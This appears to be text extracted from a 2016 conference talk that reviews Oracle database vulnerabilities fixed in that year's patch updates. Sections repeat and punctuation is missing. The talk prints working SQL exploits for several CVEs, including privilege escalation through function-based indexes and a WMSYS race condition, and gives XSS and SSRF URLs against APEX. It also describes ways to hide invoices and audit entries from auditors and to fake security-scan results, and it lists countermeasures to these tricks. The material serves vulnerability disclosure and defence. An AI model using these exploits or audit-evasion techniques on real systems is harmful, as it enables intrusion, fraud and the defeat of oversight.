Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Database Vulnerabilities and CPU
Patch situation is getting better but Oracle 12c
offers a large new playground (=tons of new
features) for security researchers
Problem Just a few people are doing security
research in the database
Nearly 50 of the database vulnerabilities were
foundreported by 2 researchers (David
Litchfield amp Alexander Kornbrust)
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
httpwwworaclecomtechnetworktopicssecuritycpuapr2015-2365600html
April 2016 CPU
5 security fixes (2 remote exploitable)
1 Java VM (CVSS 90)
1 OLAP (CVSS 78)
3 RDBMS Security (CVSS 59 33 33 1 remote)
httpwwworaclecomtechnetworksecurity-advisorycpuapr2016v3-2985753html
Apr 2016 CPU- CVE-2016-0690
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem AUDIT NOT EXISTS fails to capture
attempts to execute a procedure that does not
exist either because the user does not have the
execute privilege on it or because the
procedure does not exist If a DBA wants to
capture attempts to execute procedures where
the user does not have the execute privilege we
must also add
Reporter David Litchfield
Exploit
AUDIT EXECUTE PROCEDURE WHENEVER NOT SUCCESSFUL
Apr 2016 CPU- CVE-2016-0691
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem A missing (due to no execute
privilege) function is within a SELECT query the
name of the function is not logged but the
name of the table in the query
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
May 2016
Nothing special happened
June 2016
Nothing special happened
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016
Oracle CPU July 2016
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
July 2016 CPU
9 security fixes (5 remote exploitable)
1 OJVM (CVSS 90)
1 JDBC (CVSS 81 remote)
1 Portable Clusterware (CVSS 75 remote)
1 Data Pump (CVSS 67)
2 APEX (CVSS 61 58 2 remote)
1 RDBMS Security (CVSS 53 remote)
DB Shardening (CVSS 44)
1 Database Vault (CVSS 34)
httpwwworaclecomtechnetworksecurity-advisorycpujul2016-2881720html
Jul 2016 CPU- CVE-2016-3448
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem The HTMLDB_UTIL PLSQL package is
vulnerable to a XSS flaw To access it the
schema (APEX_050000) needs to be specified
first however because the config file whitelists
apex
Reporter David Litchfield
Exploit
httpexamplecomordsapex_050000htmldb_utilJSON_FROM_ARRAYP_COLS=1ampP_NAM E01=XX223E3CH13EOops3CH13EampP_F01=YampP_ROWS=1
Jul 2016 CPU- CVE-2016-3467
httpwwwdavidlitchfieldcomOracleCPUApril2016pdf
Problem Apex 5 is vulnerable to a server side
request forgery flaw ie it can be made to connect
to another web server and port regardless of
whether allowed URLs have been configured For
example the request below will connect to
someotherserver on port and POST X as a payload
This can be used as a port scanning mechanism
used to attack systems protected by a firewall etc
Reporter David Litchfield
Exploit
httpexampleordsapex_050000WWV_FLOW_WEBSERVICES_APIMAKE_REQUESTP_U RL=httpsomeotherserverportampp_envelope=X
Apr 2016 CPU- CVE-2016-3488Problem Package dbms_gsm_common allows
to change database parameter without the
admin privileges and restart
Reporter Bruno Cirone
Exploit
exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE)
Jul 2016 CPU- CVE-2016-3488mdash as SYS SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY FALSE -- as user GSMUSER SQLgt exec gsmadmin_internaldbms_gsm_commonsetdbparameter (O7_DICTIONARY_ACCESSIBILITYTRUE) PLSQL-Prozedur erfolgreich abgeschlossen -- as user SYS -Re-Run again after execution of the package SQLgt select namevalue from v$parameter where name=O7_DICTIONARY_ACCESSIBILITY O7_DICTIONARY_ACCESSIBILITY TRUE
July 2016 CPU- CVE-2016-3484
Problem SYS CAN INFLUENCE DVSYS-ANALYSIS
Reporter Alexander Kornbrust
Problem (Details + Exploit laterhellip)
FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
July 2016 CPU- CVE-2016-3489
Problem Privilege escalation via INDEX privilege
and function based index (FBI)
Reporter Alexander Kornbrust
July 2016 CPU- CVE-2016-3489
mdash Oracle 11204 SYSTEMSQLgt select grantee owner table_name FROM DBA_TAB_PRIVS WHERE PRIVILEGE = INDEX AND GRANTEE=OWNER and owner=SYS GRANTEE OWNER TABLE_NAME -------------------------------------------------------------------------------------- SYSTEM SYS INCEXP SYSTEM SYS INCFIL SYSTEM SYS INCVID SYSTEMSQLgt CREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant select on syslink$ to public 5 COMMIT 6 RETURN FOO 7 END
SQLgt grant execute on getdba to public
July 2016 CPU- CVE-2016-3489==gt System does not have access to the SYSLINK$ table SQLgt select count() from syslink$ ERROR at line 1 ORA-01031 insufficient privileges
==gt also the execution of getdba throws an errorSQLgt select getdba(i) from dual ERROR at line 1 ORA-01031 insufficient privileges ORA-06512 at SYSTEMGETDBA line 4 ==gt Now create an index on the table sysincvid using a function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(SYSTEMGETDBA(AK)) Index created SQLgt select count() from syslink$ COUNT() ---------- 11
July 2016 CPU- CVE-2016-3489-- Oracle 12102 (SYSTEM does no longer have INHERIT ANY PRIVILEGE) SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) CREATE INDEX EXPLOIT_INDEX ON SYSINCvid(SYSTEMGETDBA(1)) FEHLER in Zeile 1 ORA-06598 Nicht ausreichende INHERIT PRIVILEGES-Berechtigung ORA-06512 in SYSTEMGETDBA Zeile 1
-- On 12102 the user WMSYS has CREATE ANY INDEX and the SYSTEM user can use the -- CREATE ANY PROCEDURE to create a function in the schema of WMSYS
CREATE OR REPLACE FUNCTION wmsysGETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS PRAGMA AUTONOMOUS_TRANSACTION BEGIN execute immediate grant select on syslink$ to public COMMIT RETURN FOO END SQLgt grant execute on wmsysgetdba to public
-- now we create the index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSINCVID(WMSYSGETDBA(AK))
August 2016Hackproofing Oraclersquos eBusiness Suite by David
Litchfield
Presentation + Supporting documents
httpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suitepdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-1pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-2pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-3pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-4pdfhttpswwwblackhatcomdocsus-16materialsus-16-Litchfield-Hackproofing-Oracle-eBusiness-Suite-wp-5pdf
September 2016iexcl Nothing special happened
x
October 2016
Oracle CPU October 2016
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
October 2016 CPU
9 security fixes (1 remote exploitable)
1 OJVM (CVSS 91)
2 KernelPDB (CVSS 6460)
3 RDBMS Security (CVSS 64 33 33)
1 APEX (CVSS 61 remote)
1 RDBMS Security amp SQLPlus (CVSS 24)
httpwwworaclecomtechnetworksecurity-advisorycpuoct2016-2881722html
Oct 2016 CPU- CVE-2016-5497
Problem UNSALTED MD5 HASH STILL PRESENT IN
12C DATABASE - DIGEST VERIFIER
Shown as open problem at the DOAG 2015
presentation
Reporter Alexander Kornbrust
Oracle Password Hash 12102+
Oracle 12102 introduced a new PBKDF2
SHA512 based algorithm
The new T Password hash is 10 times slower than
the old DES hash (Oracle 7+) and 88 times slower
than the SHA1-based hash (Oracle 11+)
The new algorithm is known and already
implemented in some tools
Remark Microsoft Office 2013 is 10 times more
time consuming to crack than the new Oracle
PBKDF2
Oracle Password Hash 12102+
Letrsquos have a look at the RFC2617
KD(secret data) = H(concat(secret data))
No salt but a secret
Secret= XDBlsquo
and the hash will be MD5(XDBtiger)
and stored in the spare4-column starting with the HHash
Oct 2016 CPU- CVE-2016-5516
Problem In Oracle 12c the DBMS_PDB_EXEC_SQL
procedure is a wrapper for the
DBMS_PDBEXEC_AS_ORACLE_SCRIPT procedure which executes SQL as the SYS user The XDB user has the execute privilege on
DBMS_PDB_EXEC_SQL and as such by first exploiting
a vulnerability in a publicly executable XDB owned PLSQL object an attacker can leverage this
privilege to execute SQL as SYS The fix changes both
DBMS_PDB_EXEC_SQL and DBMS_PDB from using the
DEFINER rights to the INVOKER rights execution model Reporter David Litchfield
Oct 2016 CPU- CVE-2016-5604
Problem Privilege Escalation in Oracle Cloud
Control (1213)
Reporter Alexander Kornbrust
sqlplus sysman_apmrdsora1 SQLgtdesc dba_users ERROR ORA-04043 object SYSDBA_USERS does not exist
==gt user does not have the privilege to access DBA_USERS SQLgtselect from user_sys_privs USERNAME PRIVILEGE ADM ------------------------------ ---------------------------------------- --- SYSMAN_APM UNLIMITED TABLESPACE NO SYSMAN_APM CREATE VIEW NO SYSMAN_APM CREATE ANY LIBRARY NO SYSMAN_APM CREATE SEQUENCE NO SYSMAN_APM CREATE TABLE NO SYSMAN_APM CREATE LIBRARY NO SYSMAN_APM CREATE ANY INDEX NO
==gt CREATE ANY LIBRARY Privilege is granted to SYSMAN_APM SQLgtselect from user_role_privs USERNAME GRANTED_ROLE ADM DEF OS_ ------------------------------ ------------------------------ --- --- --- SYSMAN_APM CONNECT NO YES NO SYSMAN_APM RESOURCE NO YES NO
==gt Create a function GETDBA to escalate privileges using AUTHID CURRENT_USER SQLgtCREATE OR REPLACE FUNCTION GETDBA(FOO VARCHAR) RETURN VARCHAR DETERMINISTIC AUTHID CURRENT_USER IS 2 PRAGMA AUTONOMOUS_TRANSACTION 3 BEGIN 4 execute immediate grant dba to public 5 COMMIT 6 RETURN FOO 7 END 8 ==gt Grant execution privileges to PUBLIC SQLgt grant execute on getdba to public
==gt Create an index on SYSTEMHELP using a function based index (FBI) The function getdba is used for the function based index SQLgt CREATE INDEX EXPLOIT_INDEX ON SYSTEMHELP(SYSMAN_APMGETDBA(AK2))
==gt Reconnect is necessary SQLgt select from dba_role_privs where granted_role=DBA and grantee=PUBLIC GRANTEE GRANTED_ROLE ADM DEF ------------------------------ ------------------------------ --- --- PUBLIC DBA NO YES
November 2016
DOAG 2016
Modifying SQL Statements and Application Logic
Scenario 1
Top manager comes to the office of the DBA
and asks youbdquoTomorrow the auditor from the tax authority will
come to check our invoices Could you hide the
10000 EUR invoice just from the auditor from the
last party at the night clubI will increase your salaryhellipldquo
Scenario 2
Remove your own audit entries from the audit
log which is retrieved by the SIEM solution (eg
Splunk QRadar hellip) via JDBC
Scenario 3
You donrsquot have time to harden all your
databases but the security department wants to
see resultsInstead of fixing the problem you will just deliver
the proper results
A lot of different wisheshellip
but luckily we are using Oracle
ProblemampSolution
Oracle offers different features to fulfill these
wishes without affecting other usershellip
All these scenarios have in common that we
have to manipulate SQL statement
Select value hellip
Oracle Data Redaction allows to mask
manipulate the selected data just for a single
database user
Possible Usage replace truefalse replace USERADMINhellip
the DBA can decide what will be returned
Select value hellip
A typical query from security checklistsscanner looks
like this select upper(value) from parameter where upper(name) = XYZ
The tool expects the value TRUE but it contains FALSE
Oracle data redaction allows you to change the
result value from FALSE to TRUE==gt Audit department is happy because the database passes all the security checkshellip
hellip from tableview hellip
Modifying objects can change be used as man
in the middle as well
Possible approaches
modify views (eg add spare=DBA1 to the view dba_audit_trail)All entries of the OSUSER DBA1 will be removed in the view If a SIEM solution retrieves the audit data stuff from DBA1 is not retrieved
create or change synonyms to bdquoredirectldquo objects
replace table with viewinstead of trigger
mdashmdashmdashmdashmdash dbms_macadmmdashmdashmdashmdashmdash FUNCTION CHECK_BACKUP_PARM_VARCHAR RETURN VARCHAR2 IS TMP VARCHAR2(32767) TMP2 VARCHAR2(32767)
BEGIN SELECT DVSYSDV_SQL_TEXT INTO TMP FROM DUAL IF LENGTH(TMP) = 4000 THEN RETURN rsquoN END IF TMP2 = UPPER(TMP) IF (TMP2) LIKE RECYCLEBIN AND (TMP2) LIKE ON THEN RETURN N END IF RETURN Y END
SQLgt create or replace view mydual as select X as dummy from dual where user=DVSYS
SQLgt grant select on sysmydual to public SQLgt drop public synonym dual SQLgt create public synonym dual for sysmydual
SYS CAN INFLUENCE DVSYS-ANALYSIS VIA VIEW NAMED DUAL
Red Attack - Die Katastrophe in der Datenbank (Gunther Pipperr)
hellip where x=y
where conditions can be changed using VPD
VPD add where clauseinvoice_name = SAUNA_CLUB CHANTAL
Hide bdquocertainldquo invoices from the audit
department
Select value from tableview where x=y
SQL Translation Framework (12c only) allows to
replace an entire queryUser submits Query A SQL Translation Framework replaces Query A
with Query B
Possible Countermeasures for paranoid Auditors
Add a random string eg aksdjhiuz to avoid
SQL Translation Framework (new SQLID)
Try to get EXEMPT ACCESS POLICY to disable
VPD (even if not used in the application)
Use full qualified names instead of synonyms(eg SYSDUAL instead of DUAL)
Always check the object type (is is really a table)
Use checksums for certain database objects
(especially views)
Check the current schema to avoid attacks
(eg alter session set current_schema=otheruser)
Modifying Queries on the fly
Powerful features for application
(Huge) potential on critical systems to modify
application logic (eg DB Vault)
DBAs and AuditorsSecurity Department should
be aware of powerful Oracle features which
could be used to modify application logic
Audit these features even if not in use
Trends 2017
New hardening documents for Oracle 122
required (new features new packages hellip)
Migration to 122
More auditing projects
Integration Auditing with SIEM solutions
Q amp A
Thank you Contact
Red-Database-Security GmbH
Eibenweg 42
D-63150 Heusenstamm
Germany
Oracle Vulnerabilities 2016
Oracle Vulnerabilities 2016
Number of vulnerabilities in Oracle database increasing again
iexcl 30 findings in 2016 (2015 29 2014 43 2013 13 2012 17)
iexcl 8 remote exploitable bugs (20153 2014 4 2013 7 2012 8 )
bull January 2016 CPU (7 Vulnerabilities ndash 0 remote)
bull April 2016 CPU (5 Vulnerabilities ndash 2 remote)
bull July 2016 CPU (9 Vulnerabilities ndash 5 remote)
bull October 2016 CPU (9 Vulnerabilities ndash 1 remote)
2016
January 2016
Oracle CPU January 2016
Exploiting the Oracle Workspace Manager SQL
Race Condition (David Litchfield)
DB Database Assessment Tool
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html httpwwwdavidlitchfieldcomExploitingtheOracleWorkspaceManagerSQLRaceConditionpdf httpsgithubcomfoospidyDbDat
January 2016 CPU
7 security fixes (No remote exploitable)
1 Java VM (CVSS 90)
1 Workspace Manager (CVSS 65)
2 XML Database (CVSS 55 40)
1 Database Vault (CVSS 40)
1 Security (CVSS 40)
1 XML Developerrsquos Kit (CVSS 40)
httpwwworaclecomtechnetworktopicssecuritycpujan2016-2367955html
Jan 2016 CPU- CVE-2016-0467
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Oracle native auditing fails to capture
bdquoCreate Java Sourceldquo
Reporter David Litchfield
Exploit obvious Create Java Sourcehellip
Jan 2016 CPU- CVE-2015-4921
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Status is incorrectly reported if SYS
Auditing is used together with DB Vault
Reporter David Litchfield
Jan 2016 CPU- CVE-2015-4925
httpwwwdavidlitchfieldcomDetailsforOraclesJanuary2016CPUpdf
Problem Privilege escalation via Race Condition
in WMSYSLTCOPYFORUPDATE
Reporter David Litchfield
The Oracle Workspace Manager allows a user to version enable database tables This is achieved by creating workspaces which contain the versioned data The Workspace Manager contains a number of PLSQL packages that are used to manage workspaces To function correctly some management actions must be performed with higher privileges than a normal user might have and so to enable this some of the management functions execute with the privileges of the WMSYS user The main workspace manager interface is the LT PLSQL package and this executes with the privileges of the user that calls or invokes LT When privileged work is required to be executed LT calls the LTADM package The LTADM package executes with the privileges of the owner or definer in this case WMSYS WMSYS has a number of very powerful privileges such as CREATE ANY TRIGGER that allows the grantee the privilege to create a trigger in any schema with the exception of the SYS schema
Jan 2016 CPU- CVE-2015-4925
SELECT COUNT() INTO CNTFROM V$OPEN_CURSOR OC V$SQL S V$OBJECT_DEPENDENCY OD WHERE OCSID = USER_SID AND [hellip] AND ODTO_TYPE IN (78911)
Here ODTO_TYPEs 789 and 11 are functions procedures packages and objects If any such dependency exists then the user supplied query will not be executed and an error is raised IF (CNTgt0) THEN WMSYSWM_ERRORRAISEERROR(WMSYSLTWM_ERROR_81_NO) END IF
SQL_STR2 =declaredelstatuses wmsysltUtilnumber_tab beginselect WM_delstatus bulk collect into delstatusesfrom || WMSYSLTUTILGETVN(TABLE_OWNER TAB_NAME _BASE) || where WM_version = || CURVER || and || NEWWHERE_CLAUSE || for updateend WMSYSLTADMEXECSQL(SQL_STR2)
Jan 2016 CPU- CVE-2015-4925SQLgt CONNECT RACERPASSWORD SQLgt CREATE TABLE FOO(X NUMBER CONSTRAINT X_PK PRIMARY KEY(X)) SQLgt INSERT INTO FOO (X) VALUES (1) SQLgt COMMITSQLgt EXEC WMSYSLTENABLEVERSIONING(sbquoFOO)
SQLgt create or replace function Y return number authid current_user is 2 pragma autonomous_transaction3 begin4 dbms_outputput_line(BANG)5 execute immediate create or replace procedure owned(p varchar) is begin execute immediate p end6 execute immediate grant execute on owned to public7 dbms_outputput_line(sys_context(userenvcurrent_user)) 8 return 19 end 10
Jan 2016 CPU- CVE-2015-4925SQLgt GRANT EXECUTE ON Y TO PUBLIC SQLgt CREATE TABLE RACER(Y NUMBER) SQLgt INSERT INTO RACER(Y) VALUES (1) SQLgt COMMIT
SQLgt create or replace procedure attempt_it is 2 begin 3 execute immediate BEGIN WMSYSLTCOPYFORUPDATE(FOOX=LENGTH((SELECT 1 FROM RACERRACER WHERE RACERY=1))) END 4 exception when others then 5 null6 end7 SQLgt declare2 i number=0 3 begin4 for i in 11000 loop 5 execute immediate alter table RACERRACER rename column Y to Z6 execute immediate alter table RACERRACER rename column Z to Y7 end loop 8 end9
Jan 2016 CPU- CVE-2015-4925
SQLgt DESC WMSYSOWNED
PROCEDURE WMSYSOWNED Argument Name Type InOut Default mdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdashmdash-
P VARCHAR2 IN
February 2016
nothing special happened
March 2016
nothing special happened
April 2016
Oracle CPU April 2016
